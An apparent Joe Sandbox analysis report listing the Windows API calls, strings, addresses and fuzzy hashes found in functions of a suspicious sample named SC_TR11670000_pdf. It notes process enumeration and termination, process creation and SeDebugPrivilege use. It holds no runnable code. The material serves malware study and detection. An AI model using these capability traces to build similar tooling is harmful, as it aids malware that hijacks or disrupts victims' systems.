                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                          • API String ID: 1924731296-2107944366
                                                                          • Opcode ID: 898699400704ff5fc6522cf2cd8e1555e98979c93b10a3c306a70e683094574f
                                                                          • Instruction ID: 41f77147bdf2f01b854ecdb0c1b9f3318196cb37d39a20f229a115b65db511d4
                                                                          • Opcode Fuzzy Hash: 898699400704ff5fc6522cf2cd8e1555e98979c93b10a3c306a70e683094574f
                                                                          • Instruction Fuzzy Hash: 9D518B71208305AFD700EF24D896F7A7BE5EB88310F04856DF5A58B2E1DB78A944CB52
                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B6F910), ref: 00B5903D
                                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B6F910), ref: 00B59071
                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B591EB
                                                                          • SysFreeString.OLEAUT32(?), ref: 00B59215
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                          • String ID:
                                                                          • API String ID: 560350794-0
                                                                          • Opcode ID: a8e59affbb01ba6bdc6c4af5542eca43e06cbe73db39532a87509f0560da6e89
                                                                          • Instruction ID: e3c97143e660f1a70e4fb85e4303a0c62a8aa2e31fc24920ec39611bf8f22d06
                                                                          • Opcode Fuzzy Hash: a8e59affbb01ba6bdc6c4af5542eca43e06cbe73db39532a87509f0560da6e89
                                                                          • Instruction Fuzzy Hash: 28F11971A00219EFDB04DF94C888EAEB7B9FF49315F1084D9F916AB291DB31AD49CB50
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B5F9C9
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B5FB5C
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B5FB80
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B5FBC0
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B5FBE2
                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B5FD5E
                                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B5FD90
                                                                          • CloseHandle.KERNEL32(?), ref: 00B5FDBF
                                                                          • CloseHandle.KERNEL32(?), ref: 00B5FE36
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                          • String ID:
                                                                          • API String ID: 4090791747-0
                                                                          • Opcode ID: 36621bb5900a399cb6ea3a747359a7ef766627c1926e85105ba553f9056791ed
                                                                          • Instruction ID: aebb07514bbd586602966b170678c883de94bd245ce5a8760ca4d300d5cdf505
                                                                          • Opcode Fuzzy Hash: 36621bb5900a399cb6ea3a747359a7ef766627c1926e85105ba553f9056791ed
                                                                          • Instruction Fuzzy Hash: E8E190312043429FC714EF24C981B7ABBE1EF88354F1488ADF8999B2A2DB31DC45CB52
                                                                          APIs
                                                                            • Part of subcall function 00B448AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B438D3,?), ref: 00B448C7
                                                                            • Part of subcall function 00B448AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B438D3,?), ref: 00B448E0
                                                                            • Part of subcall function 00B44CD3: GetFileAttributesW.KERNEL32(?,00B43947), ref: 00B44CD4
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00B44FE2
                                                                          • _wcscmp.LIBCMT ref: 00B44FFC
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00B45017
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 793581249-0
                                                                          • Opcode ID: d3442d24a1e1b55e0dcac8609b0953462c9cf53429b187cd70621f82bf2b95ce
                                                                          • Instruction ID: c75e4d5d12c29b5b5a7ad4b02eed404f0bc63d408b16271c9f84d4aa5ab62d1c
                                                                          • Opcode Fuzzy Hash: d3442d24a1e1b55e0dcac8609b0953462c9cf53429b187cd70621f82bf2b95ce
                                                                          • Instruction Fuzzy Hash: 915153B24087859BC725DB60D885ADFB7ECEF84340F10496EF189D3192EF74A68C8766
                                                                          APIs
                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B6896E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: InvalidateRect
                                                                          • String ID:
                                                                          • API String ID: 634782764-0
                                                                          • Opcode ID: 9a9b48f1628bb2b2061187a0c0525ce3b8270c072057ccf6e5b1ecc7666fb717
                                                                          • Instruction ID: 013dedc5cfca5334e33110a425e47f82caf88d16fb409c134f5a0da0e8465cfb
                                                                          • Opcode Fuzzy Hash: 9a9b48f1628bb2b2061187a0c0525ce3b8270c072057ccf6e5b1ecc7666fb717
                                                                          • Instruction Fuzzy Hash: B351B430500208BFDF209F64DC85BA93BE5FB05310F6042A2FA15E71E1DFB9A980CB91
                                                                          APIs
                                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B1C547
                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B1C569
                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B1C581
                                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B1C59F
                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B1C5C0
                                                                          • DestroyIcon.USER32(00000000), ref: 00B1C5CF
                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B1C5EC
                                                                          • DestroyIcon.USER32(?), ref: 00B1C5FB
                                                                            • Part of subcall function 00B6A71E: DeleteObject.GDI32(00000000), ref: 00B6A757
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                          • String ID:
                                                                          • API String ID: 2819616528-0
                                                                          • Opcode ID: aec3ad984ad932716cb23db806702ddbc2031adeabd03fc872b03ea66c16241c
                                                                          • Instruction ID: b836c97d8dc4386fa395a7cc624f2da24a9d6e2699f939cb384589bbdeedd740
                                                                          • Opcode Fuzzy Hash: aec3ad984ad932716cb23db806702ddbc2031adeabd03fc872b03ea66c16241c
                                                                          • Instruction Fuzzy Hash: CA515870A40249AFDB24DF25DC46FBA3BF9EB58310F104569F902972A0DBB4ED90DB60
                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00B38A84,00000B00,?,?), ref: 00B38E0C
                                                                          • HeapAlloc.KERNEL32(00000000,?,00B38A84,00000B00,?,?), ref: 00B38E13
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B38A84,00000B00,?,?), ref: 00B38E28
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00B38A84,00000B00,?,?), ref: 00B38E30
                                                                          • DuplicateHandle.KERNEL32(00000000,?,00B38A84,00000B00,?,?), ref: 00B38E33
                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00B38A84,00000B00,?,?), ref: 00B38E43
                                                                          • GetCurrentProcess.KERNEL32(00B38A84,00000000,?,00B38A84,00000B00,?,?), ref: 00B38E4B
                                                                          • DuplicateHandle.KERNEL32(00000000,?,00B38A84,00000B00,?,?), ref: 00B38E4E
                                                                          • CreateThread.KERNEL32(00000000,00000000,00B38E74,00000000,00000000,00000000), ref: 00B38E68
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                          • String ID:
                                                                          • API String ID: 1957940570-0
                                                                          • Opcode ID: e3a38e866beeed91e8540345f101bbe3b852f87e247770bdf8c68f08f6e9bb44
                                                                          • Instruction ID: 80887c669baa1f5c94553c19e5fedd08bc505c9916641f442a1f4544a6d7c257
                                                                          • Opcode Fuzzy Hash: e3a38e866beeed91e8540345f101bbe3b852f87e247770bdf8c68f08f6e9bb44
                                                                          • Instruction Fuzzy Hash: B601BBB5240309FFEB10ABA5EC4DF6B3BACEB89751F004421FA05DB1E1CAB59800CB20
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit$_memset
                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                          • API String ID: 2862541840-625585964
                                                                          • Opcode ID: 2eef14c4379743b638a10ee4fe14cc74d23b5861b61589dd0215129167481b77
                                                                          • Instruction ID: 78a4f958b8885590ff5f6c700aa5f8582b93708c03fec5582b335e189e964a1d
                                                                          • Opcode Fuzzy Hash: 2eef14c4379743b638a10ee4fe14cc74d23b5861b61589dd0215129167481b77
                                                                          • Instruction Fuzzy Hash: EE918C71A00215EBDF24DFA5D888FAEBBF8EF45711F1081D9F915AB290D7709909CBA0
                                                                          APIs
                                                                            • Part of subcall function 00B37652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B3758C,80070057,?,?,?,00B3799D), ref: 00B3766F
                                                                            • Part of subcall function 00B37652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B3758C,80070057,?,?), ref: 00B3768A
                                                                            • Part of subcall function 00B37652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B3758C,80070057,?,?), ref: 00B37698
                                                                            • Part of subcall function 00B37652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B3758C,80070057,?), ref: 00B376A8
                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00B59B1B
                                                                          • _memset.LIBCMT ref: 00B59B28
                                                                          • _memset.LIBCMT ref: 00B59C6B
                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00B59C97
                                                                          • CoTaskMemFree.OLE32(?), ref: 00B59CA2
                                                                          Strings
                                                                          • NULL Pointer assignment, xrefs: 00B59CF0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                          • String ID: NULL Pointer assignment
                                                                          • API String ID: 1300414916-2785691316
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B67093
                                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00B670A7
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B670C1
                                                                          • _wcscat.LIBCMT ref: 00B6711C
                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B67133
                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B67161
                                                                          Similarity
                                                                          • API ID: MessageSend$Window_wcscat
                                                                          • String ID: SysListView32
                                                                          • API String ID: 307300125-78025650
                                                                          APIs
                                                                            • Part of subcall function 00B43E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00B43EB6
                                                                            • Part of subcall function 00B43E91: Process32FirstW.KERNEL32(00000000,?), ref: 00B43EC4
                                                                            • Part of subcall function 00B43E91: CloseHandle.KERNEL32(00000000), ref: 00B43F8E
                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B5ECB8
                                                                          • GetLastError.KERNEL32 ref: 00B5ECCB
                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B5ECFA
                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B5ED77
                                                                          • GetLastError.KERNEL32(00000000), ref: 00B5ED82
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B5EDB7
                                                                          Similarity
                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                          • String ID: SeDebugPrivilege
                                                                          • API String ID: 2533919879-2896544425
                                                                          APIs
                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 00B432C5
                                                                          Similarity
                                                                          • API ID: IconLoad
                                                                          • String ID: blank$info$question$stop$warning
                                                                          • API String ID: 2457776203-404129466
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B4454E
                                                                          • LoadStringW.USER32(00000000), ref: 00B44555
                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B4456B
                                                                          • LoadStringW.USER32(00000000), ref: 00B44572
                                                                          • _wprintf.LIBCMT ref: 00B44598
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B445B6
                                                                          Strings
                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 00B44593
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                          • API String ID: 3648134473-3128320259
                                                                          APIs
                                                                            • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00B6D78A
                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00B6D7AA
                                                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00B6D9E5
                                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B6DA03
                                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B6DA24
                                                                          • ShowWindow.USER32(00000003,00000000), ref: 00B6DA43
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00B6DA68
                                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00B6DA8B
                                                                          Similarity
                                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                          • String ID:
                                                                          • API String ID: 1211466189-0
                                                                          APIs
                                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B1C417,00000004,00000000,00000000,00000000), ref: 00AE2ACF
                                                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00B1C417,00000004,00000000,00000000,00000000,000000FF), ref: 00AE2B17
                                                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00B1C417,00000004,00000000,00000000,00000000), ref: 00B1C46A
                                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B1C417,00000004,00000000,00000000,00000000), ref: 00B1C4D6
                                                                          Similarity
                                                                          • API ID: ShowWindow
                                                                          • String ID:
                                                                          • API String ID: 1268545403-0
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B4737F
                                                                            • Part of subcall function 00B00FF6: std::exception::exception.LIBCMT ref: 00B0102C
                                                                            • Part of subcall function 00B00FF6: __CxxThrowException@8.LIBCMT ref: 00B01041
                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B473B6
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00B473D2
                                                                          • _memmove.LIBCMT ref: 00B47420
                                                                          • _memmove.LIBCMT ref: 00B4743D
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00B4744C
                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B47461
                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B47480
                                                                          Similarity
                                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 256516436-0
                                                                          APIs
                                                                          • DeleteObject.GDI32(00000000), ref: 00B6645A
                                                                          • GetDC.USER32(00000000), ref: 00B66462
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B6646D
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00B66479
                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B664B5
                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B664C6
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B69299,?,?,000000FF,00000000,?,000000FF,?), ref: 00B66500
                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B66520
                                                                          Similarity
                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 3864802216-0
                                                                          Similarity
                                                                          • API ID: _memcmp
                                                                          • String ID:
                                                                          • API String ID: 2931989736-0
                                                                          APIs
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                            • Part of subcall function 00AFFEC6: _wcscpy.LIBCMT ref: 00AFFEE9
                                                                          • _wcstok.LIBCMT ref: 00B4EEFF
                                                                          • _wcscpy.LIBCMT ref: 00B4EF8E
                                                                          • _memset.LIBCMT ref: 00B4EFC1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                          • String ID: X
                                                                          • API String ID: 774024439-3081909835
                                                                          • Opcode ID: 37d85a987e587bfd36304642ab12f77dce9fb2be7c1258de634358485e9f6574
                                                                          • Instruction ID: c64c4c1d402c1bfd2fd6839d55eced33c96d3471f52c503d5668e86a9cfed71d
                                                                          • Opcode Fuzzy Hash: 37d85a987e587bfd36304642ab12f77dce9fb2be7c1258de634358485e9f6574
                                                                          • Instruction Fuzzy Hash: 55C17B715083419FD724EF24C985A6EB7E4FF88310F1049ADF8999B2A2DB70ED45CB82
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7ec32e2ec659b025cd0e6c103b7b07606bdb39cff1228bbcc27eecd452bf70db
                                                                          • Instruction ID: 74d3c84e170d53a2e840df74c7c7364a1e15dabcda345925fd05194067883048
                                                                          • Opcode Fuzzy Hash: 7ec32e2ec659b025cd0e6c103b7b07606bdb39cff1228bbcc27eecd452bf70db
                                                                          • Instruction Fuzzy Hash: BF716970900159EFCB148F99CC89EBEBBB9FF89310F148159F915AB291D734AA51CFA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 585c3d81a8063e01f7243685a48714a1149848b2e81b0e83121401786918af5b
                                                                          • Instruction ID: ebd1484ed5da5cb40343e99a7b05ce0f1dec48091bce09b18bf399027e72ffc0
                                                                          • Opcode Fuzzy Hash: 585c3d81a8063e01f7243685a48714a1149848b2e81b0e83121401786918af5b
                                                                          • Instruction Fuzzy Hash: 6361BA71608340ABC710EB25DC86F6FB7E9EF88714F144999F9459B2E2DA709D08C792
                                                                          APIs
                                                                          • IsWindow.USER32(01070FB8), ref: 00B6B6A5
                                                                          • IsWindowEnabled.USER32(01070FB8), ref: 00B6B6B1
                                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B6B795
                                                                          • SendMessageW.USER32(01070FB8,000000B0,?,?), ref: 00B6B7CC
                                                                          • IsDlgButtonChecked.USER32(?,?), ref: 00B6B809
                                                                          • GetWindowLongW.USER32(01070FB8,000000EC), ref: 00B6B82B
                                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B6B843
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
